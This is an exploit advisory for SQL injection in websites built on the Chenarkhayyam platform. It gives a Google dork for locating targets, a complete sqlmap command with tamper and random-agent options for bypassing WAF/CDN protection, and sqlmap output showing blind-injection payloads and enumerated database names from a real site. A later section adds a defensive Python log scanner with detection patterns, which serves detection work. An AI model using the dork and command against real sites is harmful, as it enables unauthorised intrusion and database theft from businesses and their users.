# Exploit Title: Chenarkhayyam - SQL Injection and WAF/CDN Bypass
# Google Dork : "طراحی شده توسط سایت چنار خیام"
# Date: 3/16/2024
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: chenarkhayyam (https://chenarkhayyam.com/)
# Version: MySQL=5.0.12
# Tested on: Windows/Linux/Android(termux)
## Description:
An attacker can visit the vendor's portfolio page to find other sites built on the same platform, or use the Google dork above: https://chenarkhayyam.com/sample
Next, the attacker can use sqlmap to dump the database; the random-case tamper script and randomized User-Agent are what get the requests past the WAF and CDN.
Here is the command: sqlmap -u <Target-Url> --dbs --tamper=randomcase --random-agent --technique=BT --level=5 --risk=3 --threads=1 --current-db --batch
# The response will look like this:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=44' AND 5914=5914-- DzUg
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=44' AND (SELECT 7630 FROM (SELECT(SLEEP(5)))zaOE)-- xHny
---
[11:02:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:02:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.30
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[11:02:40] [INFO] fetching current database
[11:02:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:02:41] [INFO] retrieved: baalinap_balinapp
current database: 'baalinap_balinapp'
[11:04:18] [INFO] fetching database names
[11:04:18] [INFO] fetching number of databases
[11:04:18] [INFO] resumed: 2
[11:04:18] [INFO] resumed: information_schema
[11:04:18] [INFO] resumed: baalinap_balinapp
available databases [2]:
[*] baalinap_balinapp
[*] information_schema
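From the defender's side, the two payload shapes in the sqlmap output above (a boolean tautology and a `SLEEP()` delay, each terminated with `-- `) are easy to spot in web-server access logs, provided the matching folds case first, since `--tamper=randomcase` exists precisely to slip mixed-case keywords past case-sensitive WAF rules. The following is an added example, not part of the original advisory or of any code from the vendor: a small log scanner run over constructed sample lines (the log lines, client addresses and the `/sample.php` path are assumptions, not from the page) that normalises each query parameter and flags the injection markers. The real fix for the underlying bug is to bind `id` as a prepared-statement parameter rather than concatenate it into the query; this scanner only helps detect attempts against sites that have not yet been patched.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (common log format). They are not taken
# from the advisory; the query strings mirror the two payload shapes sqlmap
# reported above, including the mixed-case form that --tamper=randomcase emits.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Mar/2024:11:02:39 +0000] "GET /sample.php?id=44 HTTP/1.1" 200 5120
203.0.113.5 - - [16/Mar/2024:11:02:40 +0000] "GET /sample.php?id=44%27%20AND%205914%3D5914--%20DzUg HTTP/1.1" 200 5120
203.0.113.5 - - [16/Mar/2024:11:02:41 +0000] "GET /sample.php?id=44%27%20aNd%20(sElEcT%207630%20FROM%20(SELECT(sLeEp(5)))zaOE)--%20xHny HTTP/1.1" 200 5120
198.51.100.7 - - [16/Mar/2024:11:03:00 +0000] "GET /sample.php?id=45 HTTP/1.1" 200 4980
"""

# Pull the client address and the request target out of one log line.
REQUEST_LINE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Each rule runs against the lower-cased, whitespace-collapsed parameter value,
# so case-randomised keywords ("aNd", "sLeEp") match exactly like plain ones.
RULES = {
    "boolean_tautology":  re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b"),   # AND 5914=5914
    "time_delay":         re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)"),  # SLEEP(5)
    "comment_terminator": re.compile(r"--(?:\s|$)|#"),                      # trailing "-- xHny"
    "quote_breakout":     re.compile(r"'"),                                 # closes the string literal
}


def normalize(value: str) -> str:
    """Fold case and collapse whitespace so tamper-script variations do not matter."""
    return re.sub(r"\s+", " ", value).strip().lower()


def classify(value: str) -> list[str]:
    """Return the names of the rules that fire on one decoded parameter value."""
    norm = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def analyze_log(text: str) -> list[dict]:
    """Scan every request line and report parameters carrying injection markers."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes values, so %27 / %20 become ' and space.
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            tags = classify(value)
            if tags:
                findings.append({"client": m.group("client"), "param": name,
                                 "value": value, "tags": tags})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['client']} {f['param']}={f['value']!r} -> {', '.join(f['tags'])}")
```

Running the block reports the two tampered requests from 203.0.113.5 and stays silent on the plain `id=44` and `id=45` lookups. The `quote_breakout` and `comment_terminator` rules fire on both payloads; `boolean_tautology` and `time_delay` tell the two sqlmap techniques (`--technique=BT`) apart, which is useful when deciding whether the response-size or response-time side of the log needs a closer look.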